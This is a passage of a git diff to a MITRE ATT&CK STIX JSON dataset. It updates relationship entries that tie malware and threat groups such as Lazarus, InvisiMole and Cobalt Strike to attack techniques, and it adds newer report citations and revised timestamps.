"Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.", @@ -60718,11 +65783,11 @@ "description": "Mudge, R. (2017, May 23). Cobalt Strike 3.8 \u2013 Who\u2019s Your Daddy?. Retrieved June 4, 2019." } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "type": "relationship", - "modified": "2020-06-23T19:49:20.579Z", + "modified": "2020-09-11T13:33:17.804Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -60819,7 +65884,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", "type": "relationship", - "modified": "2020-07-14T19:36:40.744Z", + "modified": "2020-09-16T16:12:48.245Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -60832,7 +65897,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "type": "relationship", - "modified": "2020-06-20T22:44:36.250Z", + "modified": "2020-08-04T14:04:58.456Z", "created": "2017-05-31T21:33:27.025Z" }, { @@ -61233,7 +66298,7 @@ { "id": "relationship--4e66aad2-7c30-4c05-9f8e-767ac1cff08e", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[JPIN](https://attack.mitre.org/software/S0201) lower disable security settings by changing Registry keys.(Citation: Microsoft PLATINUM April 2016)", + "description": "[JPIN](https://attack.mitre.org/software/S0201) can lower security settings by changing Registry keys.(Citation: Microsoft PLATINUM April 2016)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -61248,7 +66313,7 @@ "relationship_type": "uses", "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "type": "relationship", - "modified": "2020-03-16T16:57:38.875Z", + "modified": "2020-08-11T19:44:31.594Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -61456,15 +66521,16 @@ ], "external_references": [ { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "type": "relationship", - "modified": "2020-03-17T02:22:39.582Z", + "modified": "2020-09-02T18:46:32.713Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -61711,7 +66777,7 @@ { "id": "relationship--500130c0-d049-4e67-9bcc-d60a5f6dfd4c", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Various [Lazarus Group](https://attack.mitre.org/groups/G0032) malware enumerates logged-on users.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)", + "description": "Various [Lazarus Group](https://attack.mitre.org/groups/G0032) malware enumerates logged-on users.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -61722,9 +66788,9 @@ "source_name": "Novetta Blockbuster" }, { - "source_name": "Novetta Blockbuster Destructive Malware", + "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", - "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + "source_name": "Novetta Blockbuster Destructive Malware" }, { "source_name": "Novetta Blockbuster Loaders", @@ -61732,21 +66798,26 @@ "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf" }, { - "source_name": "Novetta Blockbuster RATs", + "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Remote Administration Tools & Content Staging Malware Report. Retrieved March 16, 2016.", - "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf" + "source_name": "Novetta Blockbuster RATs" }, { - "source_name": "McAfee Lazarus Resurfaces Feb 2018", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", "description": "Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.", - "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/" + "source_name": "McAfee Lazarus Resurfaces Feb 2018" + }, + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "type": "relationship", - "modified": "2019-12-20T14:28:39.078Z", + "modified": "2020-08-10T15:05:31.308Z", "created": "2017-05-31T21:33:27.069Z" }, { @@ -61851,7 +66922,7 @@ { "id": "relationship--ae61abba-14fb-4d4e-9f8e-a3b18500b449", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[netsh](https://attack.mitre.org/software/S0108). [Lazarus Group](https://attack.mitre.org/groups/G0032) malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, [Lazarus Group](https://attack.mitre.org/groups/G0032) malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster Tools)(Citation: US-CERT SHARPKNOT June 2018)", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, [Lazarus Group](https://attack.mitre.org/groups/G0032) malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster Tools)(Citation: US-CERT SHARPKNOT June 2018). During a 2019 intrusion, [Lazarus Group](https://attack.mitre.org/groups/G0032) disabled Windows Defender and Credential Guard as some of their first actions on host.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020) ", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -61867,21 +66938,26 @@ "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf" }, { - "source_name": "Novetta Blockbuster Tools", + "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Tools Report. Retrieved March 10, 2016.", - "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf" + "source_name": "Novetta Blockbuster Tools" }, { "source_name": "US-CERT SHARPKNOT June 2018", "description": "US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.", "url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" + }, + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "type": "relationship", - "modified": "2020-03-28T00:29:31.133Z", + "modified": "2020-09-22T18:22:30.521Z", "created": "2017-05-31T21:33:27.067Z" }, { @@ -62521,7 +67597,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "type": "relationship", - "modified": "2020-03-26T17:17:42.600Z", + "modified": "2020-09-29T14:48:07.343Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -63077,7 +68153,7 @@ { "id": "relationship--6549c38d-46b4-4633-a479-0cbeb405f186", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "A [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample conducts C2 over HTTP.(Citation: McAfee Lazarus Resurfaces Feb 2018)", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) malware has conducted C2 over HTTP and HTTPS.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -63086,13 +68162,28 @@ "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", "description": "Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.", "source_name": "McAfee Lazarus Resurfaces Feb 2018" + }, + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + }, + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "type": "relationship", - "modified": "2020-03-17T01:43:05.507Z", + "modified": "2020-09-22T16:38:56.294Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -63985,22 +69076,27 @@ { "id": "relationship--7e860d9b-29fd-4acf-b624-076a0c60b9df", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) gathers informatin on the IP forwarding table, MAC address, and network SSID.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "type": "relationship", - "modified": "2020-03-17T00:09:26.030Z", + "modified": "2020-08-17T14:37:43.896Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -64153,7 +69249,7 @@ "source_name": "Cobalt Strike TTPs Dec 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", "type": "relationship", @@ -64455,7 +69551,7 @@ { "id": "relationship--3fe9b64a-6435-4592-9181-2ad50ee93044", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia saves information gathered about the victim to a file that is uploaded to one of its 10 C2 servers. [Lazarus Group](https://attack.mitre.org/groups/G0032) malware RomeoDelta copies specified directories from the victim's machine, then archives and encrypts the directories before uploading to its C2 server.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia saves information gathered about the victim to a file that is uploaded to one of its 10 C2 servers. [Lazarus Group](https://attack.mitre.org/groups/G0032) malware RomeoDelta copies specified directories from the victim's machine, then archives and encrypts the directories before uploading to its C2 server.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs) [Lazarus Group](https://attack.mitre.org/groups/G0032) has used wevtutil to export Window security event logs.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020) ", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -64471,16 +69567,21 @@ "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf" }, { - "source_name": "Novetta Blockbuster RATs", + "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Remote Administration Tools & Content Staging Malware Report. Retrieved March 16, 2016.", - "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf" + "source_name": "Novetta Blockbuster RATs" + }, + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "type": "relationship", - "modified": "2019-12-20T14:28:39.056Z", + "modified": "2020-10-02T16:21:22.322Z", "created": "2017-05-31T21:33:27.069Z" }, { @@ -65012,7 +70113,7 @@ "description": "Mudge, R. (2017, May 23). Cobalt Strike 3.8 \u2013 Who\u2019s Your Daddy?. Retrieved June 4, 2019." } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "type": "relationship", @@ -65742,15 +70843,16 @@ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" }, { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", "type": "relationship", - "modified": "2020-03-17T02:22:39.586Z", + "modified": "2020-09-02T18:46:32.746Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -65769,9 +70871,9 @@ ], "source_ref": "malware--2a70812b-f1ef-44db-8578-a496a227aef2", "relationship_type": "uses", - "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "target_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", "type": "relationship", - "modified": "2020-03-16T17:21:37.008Z", + "modified": "2020-08-13T20:15:39.681Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -65851,15 +70953,16 @@ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" }, { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "type": "relationship", - "modified": "2020-03-17T02:22:39.579Z", + "modified": "2020-09-02T18:46:32.820Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -67358,7 +72461,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "type": "relationship", @@ -67924,19 +73027,24 @@ "target_ref": "malware--59a97b15-8189-4d51-9404-e1ce8ea4a069", "external_references": [ { - "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", + "source_name": "XAgentOSX 2017", "description": "Robert Falcone. (2017, February 14). XAgentOSX: Sofacy's Xagent macOS Tool. Retrieved July 12, 2017.", - "source_name": "XAgentOSX 2017" + "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" }, { "source_name": "Symantec APT28 Oct 2018", "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018." + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." } ], - "description": "(Citation: XAgentOSX 2017)(Citation: Symantec APT28 Oct 2018)", + "description": "(Citation: XAgentOSX 2017)(Citation: Symantec APT28 Oct 2018)(Citation: US District Court Indictment GRU Oct 2018)", "type": "relationship", - "modified": "2019-09-18T15:14:13.506Z", + "modified": "2020-10-01T18:55:45.528Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -68157,7 +73265,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", "type": "relationship", @@ -68657,13 +73765,13 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "type": "relationship", - "modified": "2020-05-26T15:02:19.963Z", + "modified": "2020-09-17T12:26:53.793Z", "created": "2017-05-31T21:33:27.019Z" }, { "id": "relationship--c63c7dc5-e374-4bf0-9839-0f940ac6d46c", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can communicate over HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)", + "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can communicate over HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -68677,13 +73785,18 @@ "source_name": "TrendMicro Gamaredon April 2020", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/", "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020." + }, + { + "source_name": "ESET Gamaredon June 2020", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020." } ], "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf", "relationship_type": "uses", "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "type": "relationship", - "modified": "2020-06-22T17:55:32.004Z", + "modified": "2020-08-31T15:06:48.415Z", "created": "2017-05-31T21:33:27.080Z" }, { @@ -69215,22 +74328,27 @@ { "id": "relationship--c9412068-a35c-4be3-9945-a1f69f2f77db", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can bypass UAC and create an elevated COM object to escalate privileges.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can use fileless UAC bypass and create an elevated COM object to escalate privileges.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", "type": "relationship", - "modified": "2020-03-17T00:09:26.022Z", + "modified": "2020-07-17T19:22:28.806Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -69773,22 +74891,27 @@ { "id": "relationship--b6a89ded-fa53-42b9-8f40-03c845123ac0", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can decrypt, unpack and load a DLL from its resources.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "type": "relationship", - "modified": "2020-03-17T00:09:26.043Z", + "modified": "2020-08-18T13:13:30.938Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -69985,7 +75108,7 @@ { "id": "relationship--1f764874-0e08-4799-9487-a9e12c499c13", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[FIN6](https://attack.mitre.org/groups/G0037) has also used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -70005,7 +75128,7 @@ "relationship_type": "uses", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "type": "relationship", - "modified": "2020-03-17T18:57:26.400Z", + "modified": "2020-10-19T18:18:50.146Z", "created": "2017-05-31T21:33:27.071Z" }, { @@ -70573,22 +75696,22 @@ { "id": "relationship--aef68e46-d1e1-49b9-aade-6c1bf226e053", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can lists information about files in a directory.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can list information about files in a directory and recently opened or used documents. [InvisiMole](https://attack.mitre.org/software/S0260) can also search for specific files by supplied file mask.(Citation: ESET InvisiMole June 2018)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "type": "relationship", - "modified": "2020-03-17T00:09:26.132Z", + "modified": "2020-08-17T14:08:26.521Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -70856,22 +75979,27 @@ { "id": "relationship--fabd053f-487c-404f-b1b0-b090e442ff83", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) saves one of its files as mpr.dll in the Windows folder, masquerading as a legitimate library file.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", 